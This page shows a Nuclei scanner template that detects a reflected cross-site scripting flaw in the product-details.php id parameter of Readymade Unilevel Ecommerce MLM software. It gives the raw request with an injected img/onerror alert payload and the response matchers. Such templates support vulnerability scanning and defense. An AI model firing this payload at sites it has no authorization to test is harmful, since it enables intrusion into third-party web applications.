Skip to content

Readymade Unilevel Ecommerce MLM - Cross-Site Scripting

ID: readymade-unilevel-xss

Severity: high

Author: s4e-io

Tags: ecommerce,readymade,xss

Readymade Unilevel Ecommerce software has xss vulnerability in product-details.php?id

id: readymade-unilevel-xss
info:
name: Readymade Unilevel Ecommerce MLM - Cross-Site Scripting
author: s4e-io
severity: high
description: |
Readymade Unilevel Ecommerce software has xss vulnerability in product-details.php?id
reference:
- https://packetstormsecurity.com/files/179886/ReadyMade-Unilevel-Ecommerce-MLM-Blind-SQL-Injection-Cross-Site-Scripting.html
metadata:
vendor: i-netsolution
product: readymade-unilevel-ecommerce
tags: ecommerce,readymade,xss
variables:
num1: "{{rand_int(1000, 9999)}}"
http:
- raw:
- |
GET /product-details.php?id=1"><img/src/onerror=.1|alert`{{num1}}`+class={{num1}}> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "><img/src/onerror=.1|alert`{{num1}}` class={{num1}}>", "user_login_id")'
- 'contains(content_type, "text/html")'
- "status_code == 200"
condition: and
# digest: 4a0a00473045022100f1cad834af76062ba542d826ee7afefbafd9ac98f35c9cf33b142dc3eba70c0902207e6102692d6c93620263915993dad41c6eb89e67bd2ecedd4d558146a0ec3a8f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/readymade-unilevel-xss.yaml"

View on Github